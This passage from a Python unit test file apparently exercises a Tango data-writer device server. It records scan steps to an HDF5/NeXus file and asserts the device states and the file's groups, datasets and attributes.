at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.path, fname)
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
            # the PNI writer reported the link target name "mca" here;
            # the h5cpp writer returns the link name "data"
            # PNI: self.assertEqual(mca.name, "mca")
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord_skipacq(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
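            # opening the same entry again fails since entry1 already exists
            # in the reopened file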
self.myAssertRaise(Exception, dp.openEntry)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
dp.OpenFile()
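            # with skipacquisition enabled OpenEntry reuses the existing entry
            # instead of writing its data again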
dp.skipacquisition = True
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.skipacquisition = True
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.skipacquisition = True
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.path, fname)
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
            # the PNI writer reported the link target name "mca" here;
            # the h5cpp writer returns the link name "data"
            # PNI: self.assertEqual(mca.name, "mca")
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord_canfail(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
